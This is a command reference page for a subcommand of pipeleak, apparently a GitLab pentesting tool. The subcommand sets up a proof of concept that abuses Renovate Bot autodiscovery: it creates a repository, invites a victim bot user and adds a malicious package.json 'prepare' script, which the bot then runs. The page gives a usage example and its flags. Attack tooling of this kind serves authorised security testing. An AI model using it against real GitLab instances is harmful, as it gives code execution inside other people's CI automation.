Skip to content

Autodiscovery

pipeleak gl renovate autodiscovery

Create a PoC for Renovate Autodiscovery misconfigurations exploitation

Synopsis

Create a project with a Renovate Bot configuration that will be picked up by an existing Renovate Bot user. The Renovate Bot will then execute the 'prepare' script defined in package.json which you can customize in exploit.sh.

1
pipeleak gl renovate autodiscovery [flags]

Examples

1
2
# Create a project and invite the victim Renovate Bot user to it. Adds a malicious prepare script to package.json which is executed by the Renovate Bot during the renovation process.    
pipeleak gl renovate autodiscovery --token glpat-xxxxxxxxxxx --gitlab https://gitlab.mydomain.com --repoName my-exploit-repo --username renovate-bot-user

Options

1
2
3
  -h, --help              help for autodiscovery
  -r, --repoName string   The name for the created repository
  -u, --username string   The username of the victim Renovate Bot user to invite

Options inherited from parent commands

1
2
3
4
5
6
      --coloredLog       Output the human-readable log in color (default true)
  -g, --gitlab string    GitLab instance URL
      --json             Use JSON as log output format
  -l, --logfile string   Log output to a file
  -t, --token string     GitLab API Token
  -v, --verbose          Verbose logging

SEE ALSO